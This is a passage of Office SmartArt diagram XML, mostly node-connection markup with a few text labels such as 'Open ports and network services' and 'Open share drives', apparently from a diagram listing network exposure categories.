    <dgm:cxn modelId="{EC2E4F75-6EBF-4BA1-887C-6E46796C6F17}" type="presOf" srcId="{AF7EE6BD-3CF6-4A47-A2D7-639C73CC6EA4}" destId="{B09F0B4F-CA7A-41EB-A83C-B4F19FD4CFEA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{A11DB377-BE83-40F2-9090-12FD9F4DE52F}" type="presOf" srcId="{0B276BCA-7428-4D1D-94EF-D460592D34FD}" destId="{DF6A93FF-3B96-4EF9-AD18-3A5BFF91F1DE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C185BC58-6169-48E0-9679-31C4AC094EDD}" type="presOf" srcId="{9C90CB48-64CB-4AC8-BDD6-914A145ED2C3}" destId="{37B08A40-F777-482E-8818-267CE40186F9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{487ADE7B-013C-4CCA-B8D4-9309250CFDE7}" type="presOf" srcId="{50D12154-A636-4F2F-A7C3-7C1885E2F99E}" destId="{277D72A6-90D2-4429-90E9-6953844F5326}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{E088CE80-07B1-4384-8C4B-7073B1CA0030}" type="presOf" srcId="{0B276BCA-7428-4D1D-94EF-D460592D34FD}" destId="{00BB32A3-BB9B-47B0-BE4B-CED34698238A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{0BFCCC91-D6D6-4D51-9422-AB24895016BA}" type="presOf" srcId="{505A12ED-AE2B-4C8B-A301-27E29AFA306D}" destId="{87E06F25-E2AF-4E5C-9F89-ED95A8C19C69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{D6BBCF95-70C2-45D3-860A-981DAE6A8C6A}" type="presOf" srcId="{7E47E244-A345-4BF9-BBA1-AA17CD9992F8}" destId="{A57530B6-AD99-48AC-A689-99D835BAD208}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{58FAD997-E07B-461A-A5EA-3BC7F9EF8433}" srcId="{4146EB0D-0827-47F9-AB96-49946760F1E7}" destId="{2CA1F273-C584-44F5-8834-3ACA7EC4B83C}" srcOrd="0" destOrd="0" parTransId="{0B276BCA-7428-4D1D-94EF-D460592D34FD}" sibTransId="{1E5AD08F-369D-494B-BE64-F5944A70AF42}"/>
    <dgm:cxn modelId="{AFE3A899-C34C-4621-A93C-FA26041B387B}" type="presOf" srcId="{505A12ED-AE2B-4C8B-A301-27E29AFA306D}" destId="{469A26CA-02D5-4100-BEA8-E9E3A70325BC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7728CB9D-E7C2-4A5B-9A61-BE326E999321}" srcId="{13EDF867-8857-4B2B-9DEA-77047E0C22E3}" destId="{8A41485E-C3EC-452C-8199-E2461D6F1A17}" srcOrd="1" destOrd="0" parTransId="{505A12ED-AE2B-4C8B-A301-27E29AFA306D}" sibTransId="{82CE5B59-1859-4339-9047-B7224EF83C73}"/>
    <dgm:cxn modelId="{79D7FBA4-9859-49E8-9C3E-D37ADA1D1C20}" type="presOf" srcId="{4532ED81-96CA-4EE3-B8BC-2F35ED89E0FF}" destId="{FE235E4C-1619-41E4-8ADD-DD0013CC8E48}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6D4B48A5-6632-4FD0-BAFF-4D033D8C7A9D}" type="presOf" srcId="{4A98FC70-5EEA-4BC4-A510-C4EB731F824A}" destId="{901B692C-FB90-416C-976B-8064B18296EE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{0E9B3FAA-3085-4338-8E15-55D6B305E7B3}" srcId="{8A41485E-C3EC-452C-8199-E2461D6F1A17}" destId="{9C90CB48-64CB-4AC8-BDD6-914A145ED2C3}" srcOrd="1" destOrd="0" parTransId="{7E47E244-A345-4BF9-BBA1-AA17CD9992F8}" sibTransId="{452D9548-7C9F-44FA-B323-095E16D98B1B}"/>
    <dgm:cxn modelId="{004AE0B0-DAA8-42B4-830C-6394DF20DA23}" type="presOf" srcId="{27BA56BD-3AEF-47CD-BC3B-337510DB1CEC}" destId="{226025E3-5D0C-4A57-9C86-C29986CB2E96}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{ECE7E1B7-EA04-49B6-B0A2-D861ED717418}" type="presOf" srcId="{8A41485E-C3EC-452C-8199-E2461D6F1A17}" destId="{138E7EF0-3241-4730-9B55-885645F947BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{18DB7EB9-FF48-4E9F-9300-94EC599A8FB7}" srcId="{13EDF867-8857-4B2B-9DEA-77047E0C22E3}" destId="{4146EB0D-0827-47F9-AB96-49946760F1E7}" srcOrd="0" destOrd="0" parTransId="{67A25907-5CE9-41EF-B4AE-3B176CC1C033}" sibTransId="{D558E6DA-106C-432C-8E59-FCAF75E15FC8}"/>
    <dgm:cxn modelId="{3719DEB9-751E-4534-89D9-BEA5B4E54F1D}" type="presOf" srcId="{7E47E244-A345-4BF9-BBA1-AA17CD9992F8}" destId="{5CD97FA7-D68E-45D2-B2D1-0A5603D42445}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{F250F2CD-6234-41BA-997E-93FFCDAF22A8}" type="presOf" srcId="{56F25769-8ED7-4EA2-A41A-F2F3790AACCB}" destId="{E6035795-2389-4376-89EA-186572F07342}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{2CD83AD6-6102-420D-99FD-CA34AFA986E6}" type="presOf" srcId="{B571A3D0-3BC6-4CD4-9246-E1079DCEDC6C}" destId="{6DDA1F4E-7148-405A-840E-FA653BB1B391}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{67A7CBDB-2507-4FEC-BB9E-C63F88CF4431}" type="presOf" srcId="{8247D590-55A1-44AA-BDB4-6A6C85EC01AF}" destId="{2F801FCC-7C71-4C15-ACC2-6A8E1C2AA04D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{3207DCE8-51CC-43BA-9291-25E865BAEAD1}" srcId="{4146EB0D-0827-47F9-AB96-49946760F1E7}" destId="{27BA56BD-3AEF-47CD-BC3B-337510DB1CEC}" srcOrd="1" destOrd="0" parTransId="{5DAF7FCF-8BF9-4020-83D0-70681FBC329C}" sibTransId="{C8BAB019-6EB3-4190-ABC5-43DC9A537025}"/>
    <dgm:cxn modelId="{0C3CDEEF-CB21-4362-921C-84FE37E07189}" type="presOf" srcId="{4532ED81-96CA-4EE3-B8BC-2F35ED89E0FF}" destId="{1A036098-2ABB-43CC-A3BF-456CC4B95450}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{AE0163F4-E1A5-45B9-98C8-F19E086908DA}" type="presOf" srcId="{67A25907-5CE9-41EF-B4AE-3B176CC1C033}" destId="{70185F48-1765-46F6-901F-0FC6410AFD3A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{A112F6E8-F86C-4C04-BB3C-E7A901910F1B}" type="presParOf" srcId="{B09F0B4F-CA7A-41EB-A83C-B4F19FD4CFEA}" destId="{EA62DF08-A6A7-484F-8E50-575CD1F140CB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B5B4E517-8474-42C9-875F-19B3829C9A39}" type="presParOf" srcId="{EA62DF08-A6A7-484F-8E50-575CD1F140CB}" destId="{3A98DB81-A818-4AB3-A188-A224BF06F7AB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CCC6B8A6-6CB1-4027-99D4-0499A0043AA6}" type="presParOf" srcId="{EA62DF08-A6A7-484F-8E50-575CD1F140CB}" destId="{6837B220-8C17-431E-98EC-88873C94D06A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{644920BF-08BA-4B75-846F-EE4FCBF5225B}" type="presParOf" srcId="{6837B220-8C17-431E-98EC-88873C94D06A}" destId="{B2B1B157-4476-4E81-8A83-97772E08159C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{4FEAF0F0-12B8-44A3-A2B4-32E8B5475C96}" type="presParOf" srcId="{B2B1B157-4476-4E81-8A83-97772E08159C}" destId="{70185F48-1765-46F6-901F-0FC6410AFD3A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{397C1249-EFA7-469E-A16A-BE5781F20D51}" type="presParOf" srcId="{6837B220-8C17-431E-98EC-88873C94D06A}" destId="{44834816-9E65-44F7-9DED-205D9EF3DB11}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CB3C6E3E-A412-4336-9CF9-469A02D6ED57}" type="presParOf" srcId="{44834816-9E65-44F7-9DED-205D9EF3DB11}" destId="{A9999678-19A6-423D-AF97-25ADF4262390}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{82C78167-6D22-408C-B849-090285DCD45D}" type="presParOf" srcId="{44834816-9E65-44F7-9DED-205D9EF3DB11}" destId="{AE80DF6E-DC3A-4184-8CE1-FCD4D4EA4778}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{DE6DA995-49CA-4CE2-B516-6E9DA7F074B1}" type="presParOf" srcId="{AE80DF6E-DC3A-4184-8CE1-FCD4D4EA4778}" destId="{00BB32A3-BB9B-47B0-BE4B-CED34698238A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{13AD2070-9A28-4605-9B89-AC13093AAB81}" type="presParOf" srcId="{00BB32A3-BB9B-47B0-BE4B-CED34698238A}" destId="{DF6A93FF-3B96-4EF9-AD18-3A5BFF91F1DE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C05FEDEB-49FF-4772-9312-A9B35CA40F16}" type="presParOf" srcId="{AE80DF6E-DC3A-4184-8CE1-FCD4D4EA4778}" destId="{3ED04147-2651-45DA-9E07-93BF0E7C959F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{19334D7C-1BAB-45E4-B511-663EED814FA4}" type="presParOf" srcId="{3ED04147-2651-45DA-9E07-93BF0E7C959F}" destId="{B91B3487-B3E0-4721-B1DA-8AD7EA5F8E66}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C37A68A2-ED3D-4229-991A-7194D224EBAA}" type="presParOf" srcId="{3ED04147-2651-45DA-9E07-93BF0E7C959F}" destId="{544B85C4-73F0-4D37-B3F0-A41242906EE2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B8AA6749-13DA-4B05-968D-10464C1F0CE6}" type="presParOf" srcId="{AE80DF6E-DC3A-4184-8CE1-FCD4D4EA4778}" destId="{2DBE5F84-E834-42F7-BE88-590160B5E584}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{E021EB5A-EB2F-4AA1-A3AA-C9288ACDCA9E}" type="presParOf" srcId="{2DBE5F84-E834-42F7-BE88-590160B5E584}" destId="{0841A87B-D68B-460B-880A-C138A5144B12}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7BB730B4-2EAF-469F-93A0-9B5191DF1769}" type="presParOf" srcId="{AE80DF6E-DC3A-4184-8CE1-FCD4D4EA4778}" destId="{15947EC1-1CDC-4C96-A67F-A596B84C12FE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{04326E7A-AF37-498A-B56D-ABF8F9B0EF7F}" type="presParOf" srcId="{15947EC1-1CDC-4C96-A67F-A596B84C12FE}" destId="{226025E3-5D0C-4A57-9C86-C29986CB2E96}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{9320F8A8-87C9-420C-AEAA-69C9311B76ED}" type="presParOf" srcId="{15947EC1-1CDC-4C96-A67F-A596B84C12FE}" destId="{A383194B-000A-4377-BB3E-3EB76B5D059E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{4DBD32DD-0AC4-4925-BEED-AA1250C7D36D}" type="presParOf" srcId="{6837B220-8C17-431E-98EC-88873C94D06A}" destId="{87E06F25-E2AF-4E5C-9F89-ED95A8C19C69}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{A9CF4237-D487-4FE6-817D-4290AAC62072}" type="presParOf" srcId="{87E06F25-E2AF-4E5C-9F89-ED95A8C19C69}" destId="{469A26CA-02D5-4100-BEA8-E9E3A70325BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{34E717CC-6424-4EFA-ABE6-E5E4870050EE}" type="presParOf" srcId="{6837B220-8C17-431E-98EC-88873C94D06A}" destId="{8C6B5689-6015-40BC-A702-6473BB81EC52}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7A6435E2-28C9-44E6-BB5F-408C582347FA}" type="presParOf" srcId="{8C6B5689-6015-40BC-A702-6473BB81EC52}" destId="{138E7EF0-3241-4730-9B55-885645F947BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{607E4222-199B-4DAD-90D7-D19A0B99699B}" type="presParOf" srcId="{8C6B5689-6015-40BC-A702-6473BB81EC52}" destId="{D2600115-4E27-47DC-B996-6F0C7BAB3A59}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{F0C19E3E-D8A8-4785-8DD8-8047626678F4}" type="presParOf" srcId="{D2600115-4E27-47DC-B996-6F0C7BAB3A59}" destId="{17840399-DAD1-4021-8E9E-9F974822D11A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{E87776A1-A98F-411C-8348-B33502D2F94D}" type="presParOf" srcId="{17840399-DAD1-4021-8E9E-9F974822D11A}" destId="{E1595FC3-5199-4DC3-BA05-C934FFEE9DAA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{526DF313-CC61-43A8-B00E-1FB341474372}" type="presParOf" srcId="{D2600115-4E27-47DC-B996-6F0C7BAB3A59}" destId="{B1024FEE-6929-445E-B75C-FBD28084BF6F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C0CA68B6-17CE-4980-BBD9-09FD00595EF4}" type="presParOf" srcId="{B1024FEE-6929-445E-B75C-FBD28084BF6F}" destId="{2F801FCC-7C71-4C15-ACC2-6A8E1C2AA04D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{055D3482-CE69-48C8-A8B4-99A01A390787}" type="presParOf" srcId="{B1024FEE-6929-445E-B75C-FBD28084BF6F}" destId="{FFC2BFC1-72DF-47EF-97B2-A19A635BC1A5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{3411E113-EDC5-43F0-ABB5-96E68453776C}" type="presParOf" srcId="{D2600115-4E27-47DC-B996-6F0C7BAB3A59}" destId="{5CD97FA7-D68E-45D2-B2D1-0A5603D42445}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7806B607-2EBC-4A3E-91ED-9CA5115F39A2}" type="presParOf" srcId="{5CD97FA7-D68E-45D2-B2D1-0A5603D42445}" destId="{A57530B6-AD99-48AC-A689-99D835BAD208}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{DA803763-99FE-44FD-8D37-F09A1FE09613}" type="presParOf" srcId="{D2600115-4E27-47DC-B996-6F0C7BAB3A59}" destId="{299F8D9B-83DF-4F0D-A1CF-3E4EB2D2EBF2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6A5DE849-5D4F-4D43-B921-6F83AE3F0321}" type="presParOf" srcId="{299F8D9B-83DF-4F0D-A1CF-3E4EB2D2EBF2}" destId="{37B08A40-F777-482E-8818-267CE40186F9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{18DCE710-CC16-435D-A4C2-3685F3919712}" type="presParOf" srcId="{299F8D9B-83DF-4F0D-A1CF-3E4EB2D2EBF2}" destId="{6ED7504D-45CD-4883-A36E-22BAEA72E16A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{F280746B-DC81-416C-B154-073E61D2716F}" type="presParOf" srcId="{D2600115-4E27-47DC-B996-6F0C7BAB3A59}" destId="{E0D9EE35-73AB-474E-8A52-75BE0F7163FD}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{EA4B979A-0880-4844-9C3B-506498D5974E}" type="presParOf" srcId="{E0D9EE35-73AB-474E-8A52-75BE0F7163FD}" destId="{E6035795-2389-4376-89EA-186572F07342}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{2A505FF2-8417-47B0-B5F6-28C8AF0DAC23}" type="presParOf" srcId="{D2600115-4E27-47DC-B996-6F0C7BAB3A59}" destId="{0C826D28-2233-4CBF-89B9-5F3A2108328E}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{A81F4753-E1DC-4D95-A1B2-DE7CD6D6CB78}" type="presParOf" srcId="{0C826D28-2233-4CBF-89B9-5F3A2108328E}" destId="{6DDA1F4E-7148-405A-840E-FA653BB1B391}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{901506D1-7E77-4DDE-B50F-C0A31215F074}" type="presParOf" srcId="{0C826D28-2233-4CBF-89B9-5F3A2108328E}" destId="{A02E7642-5F22-47B0-B470-CBFCCC4340AE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{3B31958C-196C-4128-B4DA-4B8A8BD4B5E8}" type="presParOf" srcId="{D2600115-4E27-47DC-B996-6F0C7BAB3A59}" destId="{5030984E-D2B0-445B-B6B2-27A1963ACEEB}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{2047BF6B-A7CD-4488-B3E4-8BD8ABE64F58}" type="presParOf" srcId="{5030984E-D2B0-445B-B6B2-27A1963ACEEB}" destId="{8501C677-F413-4FBC-869D-AF58A3AF0CA8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{09207D6F-5559-4D38-9DB8-32DCD363CADB}" type="presParOf" srcId="{D2600115-4E27-47DC-B996-6F0C7BAB3A59}" destId="{2191F89F-0A4A-4E48-93CD-FBFB0D12475E}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CA09B391-4F9D-469F-A8FC-8279069B3C9F}" type="presParOf" srcId="{2191F89F-0A4A-4E48-93CD-FBFB0D12475E}" destId="{FCEDDF1F-B42C-49B9-BFCB-E360BC2073BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{47BF4CF2-56FC-4266-AC73-92B15F71760C}" type="presParOf" srcId="{2191F89F-0A4A-4E48-93CD-FBFB0D12475E}" destId="{B4BAA3D6-54CA-4858-AFB8-1D09F52ED87D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{ECB7EB74-2C32-4814-BA4A-C553FB8DD7D0}" type="presParOf" srcId="{6837B220-8C17-431E-98EC-88873C94D06A}" destId="{1A036098-2ABB-43CC-A3BF-456CC4B95450}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{00FA37A1-ADFE-469F-A60E-E542DAA1D95A}" type="presParOf" srcId="{1A036098-2ABB-43CC-A3BF-456CC4B95450}" destId="{FE235E4C-1619-41E4-8ADD-DD0013CC8E48}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{85F2C1DF-9B14-4729-B392-7A8E61B499E9}" type="presParOf" srcId="{6837B220-8C17-431E-98EC-88873C94D06A}" destId="{DB4CFBFC-5A37-4FC5-96E6-EDD0A29FBEEB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6A55E642-B3DB-4AC6-A73B-7F3398407C40}" type="presParOf" srcId="{DB4CFBFC-5A37-4FC5-96E6-EDD0A29FBEEB}" destId="{C3CA0E7C-3B94-4CA7-897B-4D07D3A079CB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{55160928-4FD5-484B-91FE-89EFE2782A4E}" type="presParOf" srcId="{DB4CFBFC-5A37-4FC5-96E6-EDD0A29FBEEB}" destId="{1EA9F43B-27B5-423A-B537-4B0949F93A85}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{2119C66C-A77D-4AFC-9E69-132DCB8486E4}" type="presParOf" srcId="{6837B220-8C17-431E-98EC-88873C94D06A}" destId="{4ED202E6-69B9-4037-8E2F-1474157ADDE5}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{97878089-301D-4A8C-9542-766D789863C2}" type="presParOf" srcId="{4ED202E6-69B9-4037-8E2F-1474157ADDE5}" destId="{901B692C-FB90-416C-976B-8064B18296EE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{8E8099EF-45BB-4A32-8150-64D792771533}" type="presParOf" srcId="{6837B220-8C17-431E-98EC-88873C94D06A}" destId="{C52C1CD7-046B-4B4C-ACB5-A2810BB28540}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{8A8192EE-A16C-4059-9B26-D566D1013E41}" type="presParOf" srcId="{C52C1CD7-046B-4B4C-ACB5-A2810BB28540}" destId="{277D72A6-90D2-4429-90E9-6953844F5326}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{3D0F1AD4-A4AE-41D7-AD50-8D51BF51BFA9}" type="presParOf" srcId="{C52C1CD7-046B-4B4C-ACB5-A2810BB28540}" destId="{BF923C26-34A1-4C0C-91EE-C8E9FA74961B}"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3525E9-E4D2-430D-97D8-1FAEC3351692}"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IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{118AC091-7E19-43CE-B253-B0E9ECA66AB5}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Open ports and network services </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64CCBAA0-6090-4678-BAFA-09908A1876E4}" type="parTrans" cxnId="{93DCE857-ACFF-4148-AB96-25ECB3F759A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43187662-0267-448C-8EC5-B94007A807D9}" type="sibTrans" cxnId="{93DCE857-ACFF-4148-AB96-25ECB3F759A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AF2F528-4D6A-4140-92A0-A54B2185E45C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Open services</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD975546-1370-4B40-A517-28219A34F90A}" type="parTrans" cxnId="{F11BBFA4-D7BD-4630-A062-68DC9CBA128C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3BD181EC-ABB5-4268-A265-CBC863DBF2A7}" type="sibTrans" cxnId="{F11BBFA4-D7BD-4630-A062-68DC9CBA128C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39B2F951-671B-4AFB-8584-01E3DF0218AB}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Open share drives </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D9AD4F75-3A0A-45F4-A2A4-AE304C82183E}" type="parTrans" cxnId="{93983744-240C-4BD9-913E-90474BF0E42B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0159E0C-25FC-4D8D-83A2-07E5DE3A0E62}" type="sibTrans" cxnId="{93983744-240C-4BD9-913E-90474BF0E42B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70A99B7D-855D-4C6F-BB47-6B8483EB1A53}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
